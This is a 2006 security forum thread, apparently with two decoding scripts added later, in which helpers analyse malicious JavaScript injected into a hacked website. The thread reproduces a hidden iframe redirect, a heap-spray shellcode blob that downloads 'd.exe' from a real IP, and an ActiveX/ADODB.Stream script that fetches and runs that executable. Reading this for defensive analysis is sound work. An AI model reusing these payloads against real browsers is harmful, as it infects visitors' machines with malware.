Malicious javascript obfuscation

Discussion in 'Computer Security' started by Wong Yung, Oct 23, 2006.

  1. Wong Yung

    Wong Yung Guest

    Hi

    Recently the webserver my page is on was hacked. Someone put in some
    malicious javascript which I believe redirects the browser to another
    webpage. I want to go to the URL directly using something like links
    on Linux or Safari on Mac (as I have a strong suspicion it's probably
    exploiting some IE vulnerability or trying to download some Windows
    trojan) to work out what exactly it was trying to do. However it looks
    like the URL was obfuscated:

    Is there any tool I can use to work out what the URL is from this?

    Thanks!
    Wong Yung, Oct 23, 2006
    #1

  2. Wong Yung

    Todd H. Guest

    "Wong Yung" <> writes:

    > Hi
    >
    > Recently the webserver my page is on was hacked. Someone put in some
    > malicious javascript which I believe redirects the browser to another
    > webpage. I want to go to the URL directly using something like links
    > on Linux or Safari on Mac (as I have a strong suspicion it's probably
    > exploiting some IE vulnerability or trying to download some Windows
    > trojan) to work out what exactly it was trying to do. However it looks
    > like the URL was obfuscated:
    >
    >
    >
    > Is there any tool I can use to work out what the URL is from this?


    It's javascript so a web browser is all you need.

    It's a rot 4 encoding if you will. It's just taking each of the
    characters of that string s and subtracting 4 from it
    i.e. s.charCodeAt(i)-4

    By changing document.write(o) to an alert() call you can see what it
    says.

    It translates to

    <iframe src="http://e7da7.in/out.php?s_id=1" width=0 border=0 height=0 style="display:none">


    And that page appears to redirect somewhere else.

    <a href="http://kaonline.biz/redirect.php?a=/&b=ACURIOUSLONGSTRINGOFHEXCHARACTERS">Click here to enter the site </a>



    --
    Todd H.
    http://www.toddh.net/
    Todd H., Oct 23, 2006
    #2
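An added example (not Todd's or the thread's code): a Node script that decodes the char-code-shift scheme Todd describes without ever rendering or evaluating the result and, because an analyst often does not know the shift in advance, ranks every candidate shift by how much printable text and HTML/URL markup it yields. The thread's obfuscated string was not preserved on the page, so the sample is constructed here by re-encoding Todd's decoded <iframe> line with +4.

```javascript
// Added example, not from the thread. Decodes "shift every char code"
// obfuscation statically: the decoded text is returned as a string and is
// never passed to document.write()/eval(), so nothing from the payload runs.

// Todd's observation: plaintext char = s.charCodeAt(i) - 4. Generalised to any shift.
function shiftDecode(encoded, shift) {
  let out = '';
  for (let i = 0; i < encoded.length; i++) {
    out += String.fromCharCode(encoded.charCodeAt(i) - shift);
  }
  return out;
}

// Inverse of shiftDecode, used here only to build the constructed sample.
function shiftEncode(text, shift) {
  let out = '';
  for (let i = 0; i < text.length; i++) {
    out += String.fromCharCode(text.charCodeAt(i) + shift);
  }
  return out;
}

// Heuristic score for a candidate plaintext: fraction of printable ASCII,
// plus one point per HTML/URL marker that a redirect payload typically contains.
const MARKERS = ['<iframe', '<script', 'http://', 'https://', 'src=', 'document.', 'location'];
function scoreCandidate(text) {
  if (text.length === 0) return -Infinity;
  let printable = 0;
  for (let i = 0; i < text.length; i++) {
    const c = text.charCodeAt(i);
    if (c >= 0x20 && c <= 0x7e) printable++;
  }
  let score = printable / text.length;
  const lower = text.toLowerCase();
  for (const m of MARKERS) if (lower.includes(m)) score += 1;
  return score;
}

// Unknown shift: try 1..maxShift and keep the highest-scoring decode.
function bestShift(encoded, maxShift = 32) {
  let best = { shift: 0, score: -Infinity, text: '' };
  for (let k = 1; k <= maxShift; k++) {
    const text = shiftDecode(encoded, k);
    const score = scoreCandidate(text);
    if (score > best.score) best = { shift: k, score, text };
  }
  return best;
}

// Pull URLs out of the decoded markup for reporting or blocklisting.
function extractUrls(text) {
  return text.match(/https?:\/\/[^\s"'<>]+/g) || [];
}

// Constructed sample: the <iframe> Todd recovered, re-encoded with shift 4.
// (The thread's actual obfuscated string was not preserved on the page.)
const PLAIN = '<iframe src="http://e7da7.in/out.php?s_id=1" width=0 border=0 height=0 style="display:none">';
const SAMPLE = shiftEncode(PLAIN, 4);

const result = bestShift(SAMPLE);
console.log(`best shift: ${result.shift}`);
console.log(result.text);
console.log('URLs:', extractUrls(result.text));
```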

  3. Wong Yung

    Wong Yung Guest

    Todd H. wrote:
    > "Wong Yung" <> writes:
    >
    > > Hi
    > >
    > > Recently the webserver my page is on was hacked. Someone put in some
    > > malicious javascript which I believe redirects the browser to another
    > > webpage. I want to go to the URL directly using something like links
    > > on Linux or Safari on Mac (as I have a strong suspicion it's probably
    > > exploiting some IE vulnerability or trying to download some Windows
    > > trojan) to work out what exactly it was trying to do. However it looks
    > > like the URL was obfuscated:
    > >
    > >
    > >
    > > Is there any tool I can use to work out what the URL is from this?

    >
    > It's javascript so a web browser is all you need.
    >
    > It's a rot 4 encoding if you will. It's just taking each of the
    > characters of that string s and subtracting 4 from it
    > i.e. s.charCodeAt(i)-4
    >
    > By changing document.write(o) to an alert() call you can see what it
    > says.
    >
    > It translates to
    >
    > <iframe src="http://e7da7.in/out.php?s_id=1" width=0 border=0 height=0 style="display:none">
    >
    >
    > And that page appears to redirect somewhere else.
    >
    > <a href="http://kaonline.biz/redirect.php?a=/&b=ACURIOUSLONGSTRINGOFHEXCHARACTERS">Click here to enter the site </a>
    >
    >
    >
    > --
    > Todd H.
    > http://www.toddh.net/


    Thanks very much Todd!

    I went to the webpage and it's very strange. It doesn't seem to
    attempt to download anything. They (kaonline.biz) claim that someone
    is trying to blackmail them by sending spam in their name and then
    trying to extort money from them. If this is true and they are not
    lying their heads off I wonder if this is part of the supposed
    extortion attempt. Or maybe they're just saying that because really
    they are spammers and...*Sigh* I don't know what to believe anymore.

    Still this is only what it is doing *now*. The webserver looks like it
    has been hacked for a while now and god knows what's been happening in
    the meantime.

    Thanks though for helping out!
    Wong Yung, Oct 23, 2006
    #3
  4. Wong Yung

    Todd H. Guest

    "Wong Yung" <> writes:

    > Thanks very much Todd!
    >
    > I went to the webpage and it's very strange. It doesn't seem to
    > attempt to download anything. They (kaonline.biz) claim that someone
    > is trying to blackmail them by sending spam in their name and then
    > trying to extort money from them. If this is true and they are not
    > lying their heads off I wonder if this is part of the supposed
    > extortion attempt. Or maybe they're just saying that because really
    > they are spammers and...*Sigh* I don't know what to believe anymore.
    >
    > Still this is only what it is doing *now*. The webserver looks like it
    > has been hacked for a while now and god knows what's been happening in
    > the meantime.
    >
    > Thanks though for helping out!


    No problem.

    Was your webhost based on cpanel.net software? A few weeks ago, a
    whole bunch of cpanel based sites got owned and were used largely to
    spread the Internet Explorer 0day exploit du jour. I think that
    issue has been patched but it did affect a lot of folks. Curious if
    you were one of 'em.

    Best Regards,
    --
    Todd H.
    http://www.toddh.net/
    Todd H., Oct 23, 2006
    #4
  5. Wong Yung

    Wong Yung Guest

    Todd H. wrote:
    > "Wong Yung" <> writes:
    >
    > > Thanks very much Todd!
    > >
    > > I went to the webpage and it's very strange. It doesn't seem to
    > > attempt to download anything. They (kaonline.biz) claim that someone
    > > is trying to blackmail them by sending spam in their name and then
    > > trying to extort money from them. If this is true and they are not
    > > lying their heads off I wonder if this is part of the supposed
    > > extortion attempt. Or maybe they're just saying that because really
    > > they are spammers and...*Sigh* I don't know what to believe anymore.
    > >
    > > Still this is only what it is doing *now*. The webserver looks like it
    > > has been hacked for a while now and god knows what's been happening in
    > > the meantime.
    > >
    > > Thanks though for helping out!

    >
    > No problem.
    >
    > Was your webhost based on cpanel.net software? A few weeks ago, a
    > whole bunch of cpanel based sites got owned and were used largely to
    > spread the Internet Explorer 0day exploit du jour. I think that
    > issue has been patched but it did affect a lot of folks. Curious if
    > you were one of 'em.
    >
    > Best Regards,
    > --
    > Todd H.
    > http://www.toddh.net/



    No,

    I think the webserver was running Apache on Linux (I say "I think"
    because I wasn't admining it so I don't know what exactly was running
    on the computer). The problem is it wasn't updated and so I guess in
    the end you can say it was all our own fault.

    *Sigh* I'm still worried though because even though it looks like the
    hack is fairly harmless now it looks like it was hacked a while ago and
    who knows if they hadn't taken the opportunity to download Trojans onto
    a few computers first. You know how it is with security - once one
    thing gets compromised everything touching it is tainted because you
    can't be sure what the hackers were doing.

    Usually I run either Linux (most of these redirect things lead to some
    Windows specific malware) or Windows with Firefox with the NoScript
    extension which blocks all javascript except on sites you whitelist.
    However, I *did* test my website in IE several times when the script
    was present so I could make sure the css looked OK. Nor did I turn off
    scripting in IE because I hardly ever use it and I didn't think my own
    website would be a security risk. Not sure what to do now...probably
    run a full anti-virus and anti-spyware check but you know that doesn't
    catch everything. On the bright side of things I don't remember any
    anti-virus alerts, or probably more importantly any warnings about
    something trying to replace program x with a different version (I have
    a program which detects when program files get changed) when I was
    looking at my site in IE...

    Anyway, thanks a lot for your help. It did help relieve my mind a lot.
    Wong Yung, Oct 23, 2006
    #5
  6. Wong Yung

    Wong Yung Guest

    Todd H. wrote:
    > "Wong Yung" <> writes:
    >
    > > Hi
    > >
    > > Recently the webserver my page is on was hacked. Someone put in some
    > > malicious javascript which I believe redirects the browser to another
    > > webpage. I want to go to the URL directly using something like links
    > > on Linux or Safari on Mac (as I have a strong suspicion it's probably
    > > exploiting some IE vulnerability or trying to download some Windows
    > > trojan) to work out what exactly it was trying to do. However it looks
    > > like the URL was obfuscated:
    > >
    > >
    > >
    > > Is there any tool I can use to work out what the URL is from this?

    >
    > It's javascript so a web browser is all you need.
    >
    > It's a rot 4 encoding if you will. It's just taking each of the
    > characters of that string s and subtracting 4 from it
    > i.e. s.charCodeAt(i)-4
    >
    > By changing document.write(o) to an alert() call you can see what it
    > says.
    >
    > It translates to
    >
    > <iframe src="http://e7da7.in/out.php?s_id=1" width=0 border=0 height=0 style="display:none">
    >
    >
    > And that page appears to redirect somewhere else.
    >
    > <a href="http://kaonline.biz/redirect.php?a=/&b=ACURIOUSLONGSTRINGOFHEXCHARACTERS">Click here to enter the site </a>
    >
    >
    >
    > --
    > Todd H.
    > http://www.toddh.net/



    Actually looking more closely at it there seems to be something else
    going on as well. If I use links, it does exactly as you say.
    However, using Opera, Firefox or Konqueror what it does is goes to a
    webpage with


    <script>var
    s=unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
    do{s+=s;}while(s.length<0x0900000);s+=unescape
    ("%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320
    %u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2
    %uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B
    %u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B
    %uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A
    %u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B
    %u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40
    %u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304
    %u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF
    %u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D
    %uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF
    %u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF
    %u7468%u7074%u2F3A%u362F%u2E36%u3633%u322E%u3134%u322E
    %u3334%u642F%u652E%u6578");</script></head><body><embed
    src="hacked3_files/-----------------------------------------------------------.html">

    (I named the file hacked3.html)

    The
    "hacked3_files/-----------------------------------------------------------.html"
    is a html file with:

    <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
    <HTML><HEAD>
    <TITLE>403 Forbidden</TITLE>
    </HEAD><BODY>
    <H1>Forbidden</H1>
    You don't have permission to access /expd/----------- (the hyphens
    continue forever)
    AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLAAANNNNOOOOAAAQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ0000111122223333444455556666777788889999.wmv
    on this server.<P>
    <P>Additionally, a 404 Not Found
    error was encountered while trying to use an ErrorDocument to handle
    the request.
    <HR>
    <ADDRESS>Apache/1.3.37 Server at 66.36.241.243 Port 80</ADDRESS>
    </BODY></HTML>

    So it looks like on Konqueror/Firefox/Opera it was trying to download a
    wmv file (which no longer exists on the server). On links however it
    seems to go to an entirely different webpage, the one which as you
    point out tries to go to http://kaonline.biz/.
    Wong Yung, Oct 23, 2006
    #6
  7. Wong Yung

    Ant Guest

    "Wong Yung" wrote:

    > Actually looking more closely at it there seems to be something else
    > going on as well. If I use links, it does exactly as you say.
    > However, using Opera, Firefox or Konqueror what it does is goes to a
    > webpage with
    >
    > <script>var
    > s=unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
    > do{s+=s;}while(s.length<0x0900000);s+=unescape
    > ("%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320

    [snip]

    That variable "s" is storing executable code. The script inserts at
    least 9437184 "A" characters (a NOP sled of 0x41), followed by code
    which looks like this when dumped out in hex/ascii:

    0000 EB 54 8B 75 3C 8B 74 35 78 03 F5 56 8B 76 20 03 .T.u<.t5x..V.v .
    0010 F5 33 C9 49 41 AD 33 DB 36 0F BE 14 28 38 F2 74 .3.IA.3.6...(8.t
    0020 08 C1 CB 0D 03 DA 40 EB EF 3B DF 75 E7 5E 8B 5E ......@..;.u.^.^
    0030 24 03 DD 66 8B 0C 4B 8B 5E 1C 03 DD 8B 04 8B 03 $..f..K.^.......
    0040 C5 C3 75 72 6C 6D 6F 6E 2E 64 6C 6C 00 43 3A 5C ..urlmon.dll.C:\
    0050 55 2E 65 78 65 00 33 C0 64 03 40 30 78 0C 8B 40 U.exe.3.d.@0x..@
    0060 0C 8B 70 1C AD 8B 40 08 EB 09 8B 40 34 8D 40 7C ..p...@....@4.@|
    0070 8B 40 3C 95 BF 8E 4E 0E EC E8 84 FF FF FF 83 EC .@<...N.........
    0080 04 83 2C 24 3C FF D0 95 50 BF 36 1A 2F 70 E8 6F ..,$<...P.6./p.o
    0090 FF FF FF 8B 54 24 FC 8D 52 BA 33 DB 53 53 52 EB ....T$..R.3.SSR.
    00A0 24 53 FF D0 5D BF 98 FE 8A 0E E8 53 FF FF FF 83 $S..]......S....
    00B0 EC 04 83 2C 24 62 FF D0 BF 7E D8 E2 73 E8 40 FF ...,$b...~..s.@.
    00C0 FF FF 52 FF D0 E8 D7 FF FF FF 68 74 74 70 3A 2F ..R.......http:/
    00D0 2F 36 36 2E 33 36 2E 32 34 31 2E 32 34 33 2F 64 /66.36.241.243/d
    00E0 2E 65 78 65 00 00 00 00 00 00 00 00 00 00 00 00 .exe............

    I'm guessing it would use urlmon.dll to download the file "d.exe" from
    66.36.241.243, which is a small executable packed using FSG. There's
    also a reference to a file "C:\U.exe".

    > The
    > "hacked3_files/-----------------------------------------------------------.html"
    > is a html file with:


    [...]

    > AAAABBBB [snip] NNNNOOOOAAA [snip] 88889999.wmv


    The part between my snips had a control character (0x05) either side
    of it. I don't know the reason for that.

    [...]

    > So it looks like on Konqueror/Firefox/Opera it was trying to download a
    > wmv file (which no longer exists on the server). On links however it
    > seems to go to an entirely different webpage, the one which as you
    > point out tries to go to http://kaonline.biz/.


    It appears to be an exploit involving a wmv vulnerability, but I don't
    know how the binary code in the script variable "s" gets to be run.

    Also spotted here:
    http://www.castlecops.com/p842233-Possible_WMV_exploit.html
    Ant, Oct 24, 2006
    #7
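As an added example (not Ant's code or anyone else's in the thread), this Node script does statically what Ant did by hand for the script quoted in post #6: it decodes the %uXXXX units of an unescape() blob into little-endian bytes, measures the leading 0x41 sled, produces a hex/ASCII dump and pulls out embedded strings, without evaluating anything. The blob it analyses is constructed here (a short sled plus two harmless NUL-terminated strings, one of them a URL on the RFC 5737 documentation address 192.0.2.10) and is not the thread's payload.

```javascript
// Added example, not from the thread. Turns an unescape("%uXXXX...") blob
// into bytes and triages it statically (hex dump, sled length, embedded
// strings). Nothing in the blob is ever executed or evaluated.

// unescape() maps %uXXXX to one UTF-16 code unit and %XX to one unit below
// 0x100. In memory a code unit is stored little-endian, so %u54EB is the byte
// pair EB 54, which is why Ant's dump above starts with "EB 54".
function decodePercentU(s) {
  const bytes = [];
  const re = /%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g;
  let m;
  while ((m = re.exec(s)) !== null) {
    if (m[1] !== undefined) {
      const unit = parseInt(m[1], 16);
      bytes.push(unit & 0xff, unit >> 8);
    } else {
      bytes.push(parseInt(m[2], 16));
    }
  }
  return Buffer.from(bytes);
}

// Length (in UTF-16 units) that "do { s += s } while (s.length < min)"
// reaches, computed without allocating the sled. Each unit is two bytes.
function doubledLength(initialUnits, minUnits) {
  let n = initialUnits;
  do { n *= 2; } while (n < minUnits);
  return n;
}

// How many leading bytes repeat the first byte: the sled in front of the code.
function leadingRun(buf) {
  if (buf.length === 0) return { byte: null, length: 0 };
  let i = 1;
  while (i < buf.length && buf[i] === buf[0]) i++;
  return { byte: buf[0], length: i };
}

// Classic offset / hex / ASCII dump, 16 bytes per line.
function hexDump(buf, width = 16) {
  const lines = [];
  for (let off = 0; off < buf.length; off += width) {
    const chunk = buf.subarray(off, off + width);
    const hex = Array.from(chunk, b => b.toString(16).toUpperCase().padStart(2, '0')).join(' ');
    const asc = Array.from(chunk, b => (b >= 0x20 && b <= 0x7e) ? String.fromCharCode(b) : '.').join('');
    lines.push(off.toString(16).toUpperCase().padStart(4, '0') + ' ' + hex.padEnd(width * 3 - 1) + ' ' + asc);
  }
  return lines;
}

// Printable ASCII runs of at least minLen bytes, like the `strings` tool.
function extractStrings(buf, minLen = 4) {
  const out = [];
  let cur = '';
  for (const b of buf) {
    if (b >= 0x20 && b <= 0x7e) {
      cur += String.fromCharCode(b);
    } else {
      if (cur.length >= minLen) out.push(cur);
      cur = '';
    }
  }
  if (cur.length >= minLen) out.push(cur);
  return out;
}

// Full triage: identify the sled, then report on what follows it.
function analyze(blob) {
  const buf = decodePercentU(blob);
  const sled = leadingRun(buf);
  return {
    totalBytes: buf.length,
    sledByte: sled.byte,
    sledLength: sled.length,
    strings: extractStrings(buf.subarray(sled.length)),
    dump: hexDump(buf),
  };
}

// Constructed sample (NOT the thread's payload): a short 0x41 sled followed by
// two harmless NUL-terminated strings, "urlmon.dll" and a download URL on the
// RFC 5737 documentation address 192.0.2.10, encoded as little-endian %u units.
const SAMPLE =
  '%u4141%u4141%u4141%u4141' +
  '%u7275%u6D6C%u6E6F%u642E%u6C6C%u6800%u7474%u3A70%u2F2F' +
  '%u3931%u2E32%u2E30%u2E32%u3031%u642F%u652E%u6578%u0000';

const report = analyze(SAMPLE);
console.log(`sled: ${report.sledLength} x 0x${report.sledByte.toString(16)}`);
console.log('strings:', report.strings);
console.log(report.dump.join('\n'));
// The thread's loop starts from 8 units and doubles until >= 0x0900000 units:
console.log('sled units after doubling:', doubledLength(8, 0x0900000));
```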
  8. Wong Yung

    Wong Yung Guest

    Ant wrote:
    > "Wong Yung" wrote:


    >
    > > So it looks like on Konqueror/Firefox/Opera it was trying to download a
    > > wmv file (which no longer exists on the server). On links however it
    > > seems to go to an entirely different webpage, the one which as you
    > > point out tries to go to http://kaonline.biz/.

    >
    > It appears to be an exploit involving a wmv vulnerability, but I don't
    > know how the binary code in the script variable "s" gets to be run.
    >
    > Also spotted here:
    > http://www.castlecops.com/p842233-Possible_WMV_exploit.html



    Wow. Thanks very much for the info. And thanks heaps for
    unobfuscating the stuff in javascript. Hmmm...looking at the
    castlecops link it looks like we aren't the only ones who were hacked
    using the same thing. Do you have any idea why links goes to
    kaonline.biz? I'm trying to work out what role they play in all of
    this.
    Wong Yung, Oct 24, 2006
    #8
  9. Wong Yung

    Ant Guest

    "Wong Yung" wrote:

    > Wow. Thanks very much for the info. And thanks heaps for
    > unobfuscating the stuff in javascript. Hmmm...looking at the
    > castlecops link it looks like we aren't the only ones who were hacked
    > using the same thing. Do you have any idea why links goes to
    > kaonline.biz? I'm trying to work out what role they play in all of
    > this.


    I don't know if they are involved. They say they're being attacked,
    so you could report it to them, but as far as I can tell there is no
    exploit if the redirect is to kaonline.biz.

    If I use wget on the "e7da7.in" link, I get redirected to kaonline.
    However, if I use telnet, the redirection is to:
    ht_p://66.36.241.243/expd/index.php
    (I've munged the "http" in case anyone's click-happy)

    That's where the malicious code is, and I found a different (and more
    obfuscated) exploit to what you posted before.

    Where you are redirected, and what exploit is served up probably
    depends on the user-agent header of the http request.
    Ant, Oct 25, 2006
    #9
  10. Wong Yung

    Wong Yung Guest

    Ant wrote:
    > "Wong Yung" wrote:
    >
    > > Wow. Thanks very much for the info. And thanks heaps for
    > > unobfuscating the stuff in javascript. Hmmm...looking at the
    > > castlecops link it looks like we aren't the only ones who were hacked
    > > using the same thing. Do you have any idea why links goes to
    > > kaonline.biz? I'm trying to work out what role they play in all of
    > > this.

    >
    > I don't know if they are involved. They say they're being attacked,
    > so you could report it to them, but as far as I can tell there is no
    > exploit if the redirect is to kaonline.biz.
    >
    > If I use wget on the "e7da7.in" link, I get redirected to kaonline.
    > However, if I use telnet, the redirection is to:
    > ht_p://66.36.241.243/expd/index.php
    > (I've munged the "http" in case anyone's click-happy)
    >
    > That's where the malicious code is, and I found a different (and more
    > obfuscated) exploit to what you posted before.
    >
    > Where you are redirected, and what exploit is served up probably
    > depends on the user-agent header of the http request.


    *Sigh* I couldn't get a nice simple evil guy could I? BTW what is this
    other more obfuscated exploit that you found?
    Wong Yung, Oct 27, 2006
    #10
  11. Wong Yung

    Ant Guest

    "Wong Yung" wrote:

    > *Sigh* I couldn't get a nice simple evil guy could I?


    Many of the malware writers today are funded by organized crime, and
    the software is getting more sophisticated. It's not so much hackers
    having fun anymore.

    > BTW what is this other more obfuscated exploit that you found?


    There are a couple of levels of encoded script which I won't go
    through here, but eventually it boils down to this (some munging
    again; [ ] replace < >, and ht_p replaces http) ...

    [script language='jscript']
    a=new ActiveXObject('Shell.Application');
    var x = new ActiveXObject('Mic'+'ros'+'oft.X'+'MLHTTP');
    x.Open('GET','ht_p://66.36.241.243/d.exe',0);
    x.Send();
    var s=new ActiveXObject('ADODB.Stream');
    s.Mode = 3;
    s.Type = 1;
    s.Open();
    s.Write(x.responseBody);
    s.SaveToFile('../tm.exe',2);
    a.ShellExecute('../tm.exe');
    [/script]

    So here is another method of downloading "d.exe" from the same IP
    address as before, then using the ADODB.Stream cross-domain exploit
    to save the file as "tm.exe" and run it in the context of the local
    machine. MS patched this particular vulnerability some time ago.
    Ant, Oct 28, 2006
    #11
  12. Ant wrote:

    >> *Sigh* I couldn't get a nice simple evil guy could I?

    >
    > Many of the malware writers today are funded by organized crime, and
    > the software is getting more sophisticated. It's not so much hackers
    > having fun anymore.


    Actually decoding obfuscated stuff can be quite fun. F.e. I once got a
    script that used its very own URL (retrieved by document.location) as a
    part of the self-decryption - anyone who didn't care for the URL anymore
    after 4 redirects (each with a new obfuscation) and didn't store it, had a
    little problem.
    At the end, the last obfuscation layer outputted a script in a broken way,
    so it didn't work correctly. But one could still figure out what it did -
    and among many classical IE "exploits" one could actually find two new
    ones. Reported them to Microsoft quickly, and a patch was never issued.
    Business as usual.

    > So here is another method of downloading "d.exe" from the same IP
    > address as before, then using the ADODB.Stream cross-domain exploit
    > to save the file as "tm.exe" and run it in the context of the local
    > machine. MS patched this particular vulnerability some time ago.


    Not quite true. One can sometimes trigger to download new or old versions
    of existing ActiveX controls (ignoring IE's settings), and then make such
    exploits work again. Even aside from that, just invoking an ActiveX control
    without any possibility to access its scripting, can have devastating side
    effects - f.e. invoking TlntSrv.TlntClientEnum (not safe for scripting)
    made Windows 2000 Server SP3 start the Telnet Server Service if installed.
    Sebastian Gottschalk, Oct 28, 2006
    #12
  13. Wong Yung

    Wong Yung Guest

    Sebastian Gottschalk wrote:
    > Ant wrote:
    >
    > >> *Sigh* I couldn't get a nice simple evil guy could I?

    > >
    > > Many of the malware writers today are funded by organized crime, and
    > > the software is getting more sophisticated. It's not so much hackers
    > > having fun anymore.

    >
    > Actually decoding obfuscated stuff can be quite fun. F.e. I once got a
    > script that used its very own URL (retrieved by document.location) as a
    > part of the self-decryption - anyone who didn't care for the URL anymore
    > after 4 redirects (each with a new obfuscation) and didn't store it, had a
    > little problem.
    > At the end, the last obfuscation layer outputted a script in a broken way,
    > so it didn't work correctly. But one could still figure out what it did -
    > and among many classical IE "exploits" one could actually find two new
    > ones. Reported them to Microsoft quickly, and a patch was never issued.
    > Business as usual.
    >
    > > So here is another method of downloading "d.exe" from the same IP
    > > address as before, then using the ADODB.Stream cross-domain exploit
    > > to save the file as "tm.exe" and run it in the context of the local
    > > machine. MS patched this particular vulnerability some time ago.

    >
    > Not quite true. One can sometimes trigger to download new or old versions
    > of existing ActiveX controls (ignoring IE's settings), and then make such
    > exploits work again. Even aside from that, just invoking an ActiveX control
    > without any possibility to access its scripting, can have devastating side
    > effects - f.e. invoking TlntSrv.TlntClientEnum (not safe for scripting)
    > made Windows 2000 Server SP3 start the Telnet Server Service if installed.


    Now I'm getting scared...So how can I be sure there isn't any nasty
    stuff on my computer as a result of this? I've run a full antivirus
    check, a full antispyware check and a full anti-trojan check using
    Trojan Hunter and these programs at least say I'm clean. I am fully
    patched up (I always install the updates as soon as they become
    available). And I've run netstat and it doesn't show any strange
    internet connections and my firewall doesn't show any strange
    connections though of course it could be piggy-backing on another
    program. *Sigh* Who'd have thought that you'd get infected from your own
    webpage.
    Wong Yung, Oct 28, 2006
    #13
  14. Wong Yung wrote:

    >> [ActiveX is dangerous to no end]

    > Now I'm getting scared...So how can I be sure there isn't any nasty
    > stuff on my computer as a result of this?


    Comparing all relevant system binaries against a baseline set of checksums?

    Anyway, you said you're using Safari or Links (eh... try Links2). Those
    don't know anything about ActiveX - only IE is vulnerable. Maybe also
    Mozilla with the ActiveX plugin intentionally installed, but even then
    you'd have to explicitly whitelist vulnerable controls in the first place.

    > I've run a full antivirus check, a full antispyware check and a full
    > anti-trojan check using Trojan Hunter and these programs at least say I'm clean.


    Which means exactly nothing.

    > I am fully patched up (I always install the updates as soon as they become
    > available).


    Well, at least for IE, OE, WMP and the Messenger stuff (and Wordpad if
    you're not running Windows Server 2003), this means about nothing.

    > And I've run netstat and it doesn't show any strange
    > internet connections and my firewall doesn't show any strange
    > connections though of course it could be piggy-backing on another
    > program.


    As already mentioned: If you didn't use IE, there's no reason why you would
    have any problem at all.

    > *Sigh* Who'd have thought that you'd get infected from your own webpage.


    At least for IE, any user should think so: It's stated in the manual! [1]



    [1] Windows XP/Server 2003 Security Guide, Group Policies, IE, "Object
    Caching Protection". It describes how you can activate a totally incomplete
    solution to an inherent design problem that makes cross-site-scripting
    trivially possible, in conjunction with the default full trust in the
    Windows Update website as the XSS target giving every website full access
    to all security-critical functions of IE.
    Sebastian Gottschalk, Oct 28, 2006
    #14
  15. Wong Yung

    Wong Yung Guest

    Sebastian Gottschalk wrote:
    > Wong Yung wrote:
    >
    > >> [ActiveX is dangerous to no end]

    > > Now I'm getting scared...So how can I be sure there isn't any nasty
    > > stuff on my computer as a result of this?

    >
    > Comparing all relevant system binaries against a baseline set of checksums?
    >
    > Anyway, you said you're using Safari or Links (eh... try Links2). Those
    > don't know anything about ActiveX - only IE is vulnerable. Maybe also
    > Mozilla with the ActiveX plugin intentionally installed, but even then
    > you'd have to explicitly whitelist vulnerable controls in the first place.
    >
    > > I've run a full antivirus check, a full antispyware check and a full
    > > anti-trojan check using Trojan Hunter and these programs at least say I'm clean.

    >
    > Which means exactly nothing.
    >
    > > I am fully patched up (I always install the updates as soon as they become
    > > available).

    >
    > Well, at least for IE, OE, WMP and the Messenger stuff (and Wordpad if
    > you're not running Windows Server 2003), this means about nothing.
    >
    > > And I've run netstat and it doesn't show any strange
    > > internet connections and my firewall doesn't show any strange
    > > connections though of course it could be piggy-backing on another
    > > program.

    >
    > As already mentioned: If you didn't use IE, there's no reason why you would
    > have any problem at all.
    >
    > > *Sigh* Who'd have thought that you'd get infected from your own webpage.

    >
    > At least for IE, any user should think so: It's stated in the manual! [1]
    >
    >
    >
    > [1] Windows XP/Server 2003 Security Guide, Group Policies, IE, "Object
    > Caching Protection". It describes how you can activate a totally incomplete
    > solution to an inherent design problem that makes cross-site-scripting
    > trivially possible, in conjunction with the default full trust in the
    > Windows Update website as the XSS target giving every website full access
    > to all security-critical functions of IE.


    I use Linux at work but at home I have Windows XP. Usually I use
    Firefox. However, as I was changing some things on my site I thought
    that I should check that it works in IE as well (you know IE and
    css...). Ergo I looked at my homepage in IE. Normally I avoid IE like
    the plague but I thought, hey it's my own homepage, should be safe.
    Right? Unfortunately I had IE on the default Moderate Security setting
    because I never use IE.

    *Sigh*
    Wong Yung, Oct 28, 2006
    #15
  16. Wong Yung

    Wong Yung Guest

    Wong Yung wrote:

    >
    > I use Linux at work but at home I have Windows XP. Usually I use
    > Firefox. However, as I was changing some things on my site I thought
    > that I should check that it works in IE as well (you know IE and
    > css...). Ergo I looked at my homepage in IE. Normally I avoid IE like
    > the plague but I thought, hey it's my own homepage, should be safe.
    > Right? Unfortunately I had IE on the default Moderate Security setting
    > because I never use IE.
    >
    > *Sigh*


    Oh yeah, I forgot to mention. I may use Linux at work but practically
    everyone else uses Windows XP with IE. And of course they visit the
    hacked webpage fairly regularly which is actually not really my
    personal personal webpage but more like the webpage for the entire
    group (when I talk about my homepage I'm talking about my personal page
    in this larger group site) so they go there to say get the latest news
    and whatnot. I do too but I usually do so at work in Linux or if I'm
    at home using Windows using Firefox (the only time I used IE was for 2
    minutes once to check whether the css was screwed up or not. Sadly
    enough that may be all that was required to get myself hacked...).
    Most of the other people at work go there in Windows using IE. So as
    you can see, there is quite a lot of potential for trouble here...
    Wong Yung, Oct 28, 2006
    #16
  17. Wong Yung

    Ant Guest

    "Wong Yung" wrote:

    > Sebastian Gottschalk wrote:
    >> Not quite true. One can sometimes trigger to download new or old versions
    >> of existing ActiveX controls (ignoring IE's settings), and then make such
